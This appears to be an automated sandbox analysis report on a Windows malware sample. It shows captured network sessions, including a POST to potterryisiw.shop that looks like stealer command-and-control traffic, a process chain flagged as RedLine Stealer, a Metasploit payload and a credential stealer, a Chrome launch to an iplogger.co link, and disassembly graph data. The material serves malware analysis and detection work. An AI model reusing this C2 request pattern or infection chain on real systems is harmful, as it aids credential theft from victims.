                            2024-07-08 08:09:56 UTC15331OUTData Raw: 69 c9 52 f2 3d 2f 17 7a 88 3b 83 fe a8 e7 b4 28 5e 75 93 1c aa 95 44 ae a0 37 e4 44 9f 8c 9b bc 2a d2 95 f3 68 c0 06 c1 ac d7 16 79 da 79 77 fb e2 b3 b5 3f b3 50 1a ec 76 aa 51 3b 32 70 17 98 7e 76 f3 56 05 97 b6 ce 03 96 41 e6 2f 13 88 e1 22 67 5d 23 4f 8d 5a d6 70 7d e7 46 27 33 7e 2b 1f b5 07 4d 51 13 df ac d6 04 10 a8 d9 2e 15 b8 18 41 30 62 36 dd 1c 3e b0 2d 91 66 be 5b b0 0c 83 5e 0a 23 f2 14 f2 5b f7 94 c7 1b 1c db ba b5 a6 20 10 0f d7 48 3e ae 3a 7a fc 6b 86 d6 a1 a1 bb ac a7 dc 92 6b 76 4e 10 47 07 b6 06 0c 07 cb c8 19 15 5e fd b6 4f b4 6f 9a b7 bd 6b d7 1f 5e 95 58 da ee a9 14 20 ca 10 0a b4 cf 27 8d 2e 6f 4f af e9 5c 5b f3 d9 b3 c0 e8 81 09 62 a9 07 2e 45 2b 02 72 e0 ea 42 c6 93 47 11 63 e6 f1 4b 60 78 a7 12 8a 14 20 d2 4d 20 18 92 0e cc 77 ce
                            Data Ascii: iR=/z;(^uD7D*hyyw?PvQ;2p~vVA/"g]#OZp}F'3~+MQ.A0b6>-f[^#[ H>:zkkvNG^Ook^X '.oO\[b.E+rBGcK`x M w
                            2024-07-08 08:09:58 UTC810INHTTP/1.1 200 OK
                            Date: Mon, 08 Jul 2024 08:09:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=f4ifc4d87kr2fpj6o1dnfhg10v; expires=Fri, 01-Nov-2024 01:56:37 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p3EvmnlInvdstECgOa8wuKC6dydWHD52JvLMoQs3wrS9iXOs%2BUjGy1me6Qxua4a3sn%2BUyDoi%2BvV3lF5bO%2FK%2FFnAwAvCaeqwWkhlJIr%2B4dVjwL2P0tfydmYCK24NMZ1uZHBmlMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 89fe9851db744243-EWR
                            alt-svc: h3=":443"; ma=86400


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            18192.168.2.1249745188.114.96.34438060C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:59 UTC265OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 86
                            Host: potterryisiw.shop
                            2024-07-08 08:09:59 UTC86OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 66 75 4f 4c 4d 62 2d 2d 70 61 6c 70 61 74 69 6e 65 26 6a 3d 26 68 77 69 64 3d 46 34 37 37 45 38 34 43 39 46 43 32 34 36 38 46 45 45 30 32 42 36 39 45 38 44 36 43 31 32 41 39
                            Data Ascii: act=get_message&ver=4.0&lid=fuOLMb--palpatine&j=&hwid=F477E84C9FC2468FEE02B69E8D6C12A9
                            2024-07-08 08:09:59 UTC802INHTTP/1.1 200 OK
                            Date: Mon, 08 Jul 2024 08:09:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=vddvpsvhm8td9cftnbghnphnr8; expires=Fri, 01-Nov-2024 01:56:38 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=giMoiFgRfjooi61BCyzZ3tEh1Mck%2FoKhRMyxq0pgoeZo8clN209vHw%2FMyHdrUCsCjJ77QmkjONg4uoqoXbCPmNsS0y9QhJFQRBtKj09kfFcCQXuJslr08ooApT3UzKMWvZmnzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 89fe98615de1238e-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-07-08 08:09:59 UTC54INData Raw: 33 30 0d 0a 31 53 51 6f 39 69 36 39 77 38 6d 52 33 56 6c 50 56 44 4f 67 76 48 32 6a 57 6d 57 39 62 41 6d 48 70 32 73 38 51 38 38 4b 52 72 71 4f 65 51 3d 3d 0d 0a
                            Data Ascii: 301SQo9i69w8mR3VlPVDOgvH2jWmW9bAmHp2s8Q88KRrqOeQ==
                            2024-07-08 08:09:59 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            19192.168.2.124974620.114.59.183443
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:10:07 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XfbLx43C7hcaUE4&MD=R3sXdF5e HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                            Host: slscr.update.microsoft.com
                            2024-07-08 08:10:07 UTC560INHTTP/1.1 200 OK
                            Cache-Control: no-cache
                            Pragma: no-cache
                            Content-Type: application/octet-stream
                            Expires: -1
                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                            MS-CorrelationId: a8f5b6e9-1bc1-4ebd-969a-59f642004d0d
                            MS-RequestId: 9658bdfe-dd97-4eee-8ec9-043d1f7b6e95
                            MS-CV: 07FJ2Qq+o0W78keb.0
                            X-Microsoft-SLSClientCache: 1440
                            Content-Disposition: attachment; filename=environment.cab
                            X-Content-Type-Options: nosniff
                            Date: Mon, 08 Jul 2024 08:10:06 GMT
                            Connection: close
                            Content-Length: 30005
                            2024-07-08 08:10:07 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                            Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                            2024-07-08 08:10:07 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                            Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                            Session IDSource IPSource PortDestination IPDestination Port
                            20192.168.2.124974740.113.103.199443
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:10:17 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 52 34 69 62 71 36 42 4b 70 6b 75 58 54 61 44 49 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 38 31 38 62 63 63 66 64 38 66 65 37 33 32 61 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: R4ibq6BKpkuXTaDI.1Context: 5818bccfd8fe732a
                            2024-07-08 08:10:17 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-08 08:10:17 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 52 34 69 62 71 36 42 4b 70 6b 75 58 54 61 44 49 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 38 31 38 62 63 63 66 64 38 66 65 37 33 32 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 53 54 48 6b 76 4f 78 66 46 71 49 32 55 72 6f 50 5a 68 65 77 65 55 46 53 6e 46 46 57 6b 46 35 74 43 7a 34 55 62 68 59 42 75 31 64 62 57 64 48 67 69 66 7a 72 44 51 43 57 46 6c 59 45 51 6b 36 4b 65 56 76 52 73 31 77 2f 44 46 32 4b 55 34 4d 33 68 4e 50 39 41 38 6e 39 74 65 73 66 6c 76 4e 76 4e 2f 41 6a 38 35 35 69 44 57 70 61
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: R4ibq6BKpkuXTaDI.2Context: 5818bccfd8fe732a<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAVSTHkvOxfFqI2UroPZheweUFSnFFWkF5tCz4UbhYBu1dbWdHgifzrDQCWFlYEQk6KeVvRs1w/DF2KU4M3hNP9A8n9tesflvNvN/Aj855iDWpa
                            2024-07-08 08:10:17 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 52 34 69 62 71 36 42 4b 70 6b 75 58 54 61 44 49 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 38 31 38 62 63 63 66 64 38 66 65 37 33 32 61 0d 0a 0d 0a
                            Data Ascii: BND 3 CON\QOS 56MS-CV: R4ibq6BKpkuXTaDI.3Context: 5818bccfd8fe732a
                            2024-07-08 08:10:17 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-08 08:10:17 UTC58INData Raw: 4d 53 2d 43 56 3a 20 54 58 32 57 4c 51 62 38 34 45 65 44 55 5a 69 30 78 2f 7a 2b 35 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: TX2WLQb84EeDUZi0x/z+5A.0Payload parsing failed.


                            Session IDSource IPSource PortDestination IPDestination Port
                            21192.168.2.124975240.113.103.199443
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:10:56 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4c 33 67 6a 6f 68 32 53 71 30 75 44 6a 4b 49 74 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 34 35 39 65 39 30 39 33 36 33 36 32 30 36 62 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: L3gjoh2Sq0uDjKIt.1Context: f459e9093636206b
                            2024-07-08 08:10:56 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-08 08:10:56 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 4c 33 67 6a 6f 68 32 53 71 30 75 44 6a 4b 49 74 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 34 35 39 65 39 30 39 33 36 33 36 32 30 36 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 53 54 48 6b 76 4f 78 66 46 71 49 32 55 72 6f 50 5a 68 65 77 65 55 46 53 6e 46 46 57 6b 46 35 74 43 7a 34 55 62 68 59 42 75 31 64 62 57 64 48 67 69 66 7a 72 44 51 43 57 46 6c 59 45 51 6b 36 4b 65 56 76 52 73 31 77 2f 44 46 32 4b 55 34 4d 33 68 4e 50 39 41 38 6e 39 74 65 73 66 6c 76 4e 76 4e 2f 41 6a 38 35 35 69 44 57 70 61
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: L3gjoh2Sq0uDjKIt.2Context: f459e9093636206b<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAVSTHkvOxfFqI2UroPZheweUFSnFFWkF5tCz4UbhYBu1dbWdHgifzrDQCWFlYEQk6KeVvRs1w/DF2KU4M3hNP9A8n9tesflvNvN/Aj855iDWpa
                            2024-07-08 08:10:56 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 4c 33 67 6a 6f 68 32 53 71 30 75 44 6a 4b 49 74 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 34 35 39 65 39 30 39 33 36 33 36 32 30 36 62 0d 0a 0d 0a
                            Data Ascii: BND 3 CON\QOS 56MS-CV: L3gjoh2Sq0uDjKIt.3Context: f459e9093636206b
                            2024-07-08 08:10:57 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-08 08:10:57 UTC58INData Raw: 4d 53 2d 43 56 3a 20 76 30 5a 72 34 5a 61 46 77 6b 53 37 32 4a 75 53 76 4f 78 76 39 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: v0Zr4ZaFwkS72JuSvOxv9g.0Payload parsing failed.


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:04:09:07
                            Start date:08/07/2024
                            Path:C:\Users\user\Desktop\dlcdkJcbbV.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\dlcdkJcbbV.exe"
                            Imagebase:0x8d0000
                            File size:304'128 bytes
                            MD5 hash:9ADC621F718C8E283E2B946ACF914322
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.2304090109.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:4
                            Start time:04:09:23
                            Start date:08/07/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1lLub
                            Imagebase:0x7ff776010000
                            File size:3'242'272 bytes
                            MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:6
                            Start time:04:09:23
                            Start date:08/07/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2012,i,18138774805082086482,6084898120708569672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                            Imagebase:0x7ff776010000
                            File size:3'242'272 bytes
                            MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:8
                            Start time:04:09:31
                            Start date:08/07/2024
                            Path:C:\Users\user\AppData\Local\Temp\7.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Local\Temp\7.exe"
                            Imagebase:0x7ff78baa0000
                            File size:7'386'624 bytes
                            MD5 hash:F308BE1162C86C3D72AD06C4C85A67D4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Go lang
                            Yara matches:
                            • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000008.00000002.2708226918.000000C0008D8000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                            Antivirus matches:
                            • Detection: 83%, ReversingLabs
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:9
                            Start time:04:09:47
                            Start date:08/07/2024
                            Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                            Imagebase:0x4e0000
                            File size:231'736 bytes
                            MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2764259056.0000000003494000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2760836658.0000000003494000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:10
                            Start time:04:09:49
                            Start date:08/07/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2012,i,18138774805082086482,6084898120708569672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                            Imagebase:0x7ff776010000
                            File size:3'242'272 bytes
                            MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:8.3%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:160
                              Total number of Limit Nodes:9
                              execution_graph 40594 f1d01c 40595 f1d034 40594->40595 40596 f1d08e 40595->40596 40602 51c1e98 40595->40602 40606 51c1ef7 40595->40606 40611 51c0ad4 40595->40611 40620 51c2c08 40595->40620 40629 51c1ea8 40595->40629 40603 51c1ea8 40602->40603 40604 51c0ad4 CallWindowProcW 40603->40604 40605 51c1eef 40604->40605 40605->40596 40607 51c1ee7 40606->40607 40610 51c1f02 40606->40610 40608 51c1eef 40607->40608 40609 51c0ad4 CallWindowProcW 40607->40609 40608->40596 40609->40608 40610->40596 40612 51c0adf 40611->40612 40613 51c2c79 40612->40613 40615 51c2c69 40612->40615 40649 51c0bfc 40613->40649 40633 51c2e6c 40615->40633 40639 51c2da0 40615->40639 40644 51c2d90 40615->40644 40616 51c2c77 40623 51c2c18 40620->40623 40621 51c2c79 40622 51c0bfc CallWindowProcW 40621->40622 40625 51c2c77 40622->40625 40623->40621 40624 51c2c69 40623->40624 40626 51c2e6c CallWindowProcW 40624->40626 40627 51c2d90 CallWindowProcW 40624->40627 40628 51c2da0 CallWindowProcW 40624->40628 40626->40625 40627->40625 40628->40625 40630 51c1ece 40629->40630 40631 51c0ad4 CallWindowProcW 40630->40631 40632 51c1eef 40631->40632 40632->40596 40634 51c2e7a 40633->40634 40635 51c2e2a 40633->40635 40653 51c2e58 40635->40653 40656 51c2e48 40635->40656 40636 51c2e40 40636->40616 40640 51c2db4 40639->40640 40642 51c2e58 CallWindowProcW 40640->40642 40643 51c2e48 CallWindowProcW 40640->40643 40641 51c2e40 40641->40616 40642->40641 40643->40641 40645 51c2da0 40644->40645 40647 51c2e58 CallWindowProcW 40645->40647 40648 51c2e48 CallWindowProcW 40645->40648 40646 51c2e40 40646->40616 40647->40646 40648->40646 40650 51c0c07 40649->40650 40651 51c435a CallWindowProcW 40650->40651 40652 51c4309 40650->40652 40651->40652 40652->40616 40654 51c2e69 40653->40654 40660 51c4292 40653->40660 40654->40636 40657 51c2e58 40656->40657 40658 51c2e69 40657->40658 40659 51c4292 CallWindowProcW 40657->40659 40658->40636 40659->40658 40661 51c0bfc CallWindowProcW 40660->40661 40662 51c42aa 40661->40662 40662->40654 40663 f7d0b8 40664 f7d0fe 40663->40664 40668 f7d289 40664->40668 40671 f7d298 40664->40671 40665 f7d1eb 40669 f7d2c6 40668->40669 40674 f7c9a0 40668->40674 40669->40665 40672 f7c9a0 DuplicateHandle 40671->40672 40673 f7d2c6 40672->40673 40673->40665 40675 f7d300 DuplicateHandle 40674->40675 40676 f7d396 40675->40676 40676->40669 40677 f7ad38 40680 f7ae30 40677->40680 40678 f7ad47 40681 f7ae41 40680->40681 40682 f7ae64 40680->40682 40681->40682 40688 f7b0c8 40681->40688 40692 f7b0b8 40681->40692 40682->40678 40683 f7ae5c 40683->40682 40684 f7b068 GetModuleHandleW 40683->40684 40685 f7b095 40684->40685 40685->40678 40689 f7b0dc 40688->40689 40690 f7b101 40689->40690 40696 f7a870 40689->40696 40690->40683 40693 f7b0dc 40692->40693 40694 f7a870 LoadLibraryExW 40693->40694 40695 f7b101 40693->40695 40694->40695 40695->40683 40697 f7b2a8 LoadLibraryExW 40696->40697 40699 f7b321 40697->40699 40699->40690 40700 f74668 40701 f74684 40700->40701 40702 f74696 40701->40702 40706 f747a0 40701->40706 40711 f73e10 40702->40711 40704 f746b5 40707 f747c5 40706->40707 40715 f748a1 40707->40715 40719 f748b0 40707->40719 40712 f73e1b 40711->40712 40727 f75c54 40712->40727 40714 f76ff0 40714->40704 40717 f748b0 40715->40717 40716 f749b4 40716->40716 40717->40716 40723 f74248 40717->40723 40721 f748d7 40719->40721 40720 f749b4 40720->40720 40721->40720 40722 f74248 CreateActCtxA 40721->40722 40722->40720 40724 f75940 CreateActCtxA 40723->40724 40726 f75a03 40724->40726 40728 f75c5f 40727->40728 40731 f75c64 40728->40731 40730 f7709d 40730->40714 40732 f75c6f 40731->40732 40735 f75c94 40732->40735 40734 f7717a 40734->40730 40736 f75c9f 40735->40736 40739 f75cc4 40736->40739 40738 f7726d 40738->40734 40740 f75ccf 40739->40740 40742 f78653 40740->40742 40747 f7a9d0 40740->40747 40751 f7aa08 40740->40751 40741 f78691 40741->40738 40742->40741 40755 f7cdf0 40742->40755 40760 f7cde0 40742->40760 40748 f7a9d5 40747->40748 40750 f7aa3b 40748->40750 40765 f78335 CreateWindowExW 40748->40765 40750->40742 40752 f7aa23 40751->40752 40754 f7aa3b 40752->40754 40766 f78335 CreateWindowExW 40752->40766 40754->40742 40756 f7ce11 40755->40756 40757 f7ce35 40756->40757 40767 f7cfa0 40756->40767 40771 f7cf90 40756->40771 40757->40741 40761 f7ce11 40760->40761 40762 f7ce35 40761->40762 40763 f7cfa0 CreateWindowExW 40761->40763 40764 f7cf90 CreateWindowExW 40761->40764 40762->40741 40763->40762 40764->40762 40765->40750 40766->40754 40768 f7cfad 40767->40768 40769 f7cfe7 40768->40769 40775 f7c8d8 40768->40775 40769->40757 40772 f7cfa0 40771->40772 40773 f7cfe7 40772->40773 40774 f7c8d8 CreateWindowExW 40772->40774 40773->40757 40774->40773 40776 f7c8e3 40775->40776 40778 f7d8f8 40776->40778 40779 f7ca04 40776->40779 40778->40778 40780 f7ca0f 40779->40780 40781 f75cc4 CreateWindowExW 40780->40781 40782 f7d967 40781->40782 40786 f7f6e0 40782->40786 40792 f7f6c8 40782->40792 40783 f7d9a1 40783->40778 40788 f7f711 40786->40788 40789 f7f811 40786->40789 40787 f7f71d 40787->40783 40788->40787 40790 51c0db8 CreateWindowExW 40788->40790 40791 51c0dc8 CreateWindowExW 40788->40791 40789->40783 40790->40789 